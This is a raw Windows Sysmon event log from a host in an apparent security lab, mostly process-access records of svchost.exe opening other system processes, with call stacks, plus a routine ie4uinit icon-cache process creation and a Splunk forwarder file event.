12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005035Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005034Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005033Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005032Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005031Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005733Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.924{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-64CA-6064-AD00-00000000AE01}4536C:\Windows\System32\ie4uinit.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005732Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.924{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64CA-6064-AD00-00000000AE01}4536C:\Windows\System32\ie4uinit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005731Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.909{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005730Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.909{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005729Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.909{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005728Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.909{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005727Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.909{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-64CA-6064-AD00-00000000AE01}4536C:\Windows\System32\ie4uinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005726Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.909{266CAFBE-64CA-6064-AC00-00000000AE01}42122512C:\Windows\System32\ie4uinit.exe{266CAFBE-64CA-6064-AD00-00000000AE01}4536C:\Windows\System32\ie4uinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ie4uinit.exe+2d19|C:\Windows\System32\ie4uinit.exe+33b8|C:\Windows\System32\ie4uinit.exe+245e7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005725Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.912{266CAFBE-64CA-6064-AD00-00000000AE01}4536C:\Windows\System32\ie4uinit.exe11.00.14393.2999 (rs1_release_inmarket.190520-1518)IE Per-User Initialization UtilityInternet ExplorerMicrosoft CorporationIE4UINIT.EXEC:\Windows\System32\ie4uinit.exe -ClearIconCacheC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=8450580ADC40581006B7233F2B2803EB,SHA256=DD7FE0DBD6BD3B66437C093B707D1B2CA8AC72E4671B88829A4327FA6B8A00BD,IMPHASH=A9F54FA8B3C0ECA158788E684C66CA9A{266CAFBE-64CA-6064-AC00-00000000AE01}4212C:\Windows\System32\ie4uinit.exe"C:\Windows\System32\ie4uinit.exe" -UserConfig 23542300x80000000000000005724Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.768{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=905204815542592B7C6C51D0A146E6A4,SHA256=F6C41C980A06FBE07B2C1C20957B8D4BDBE0BDE54D0AF5F97FDBC76FC2F301DC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005723Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.737{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005722Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.737{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005721Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.737{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005720Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.737{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005719Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.737{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005718Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.737{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005717Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.737{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005716Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005715Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005714Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005713Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005712Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 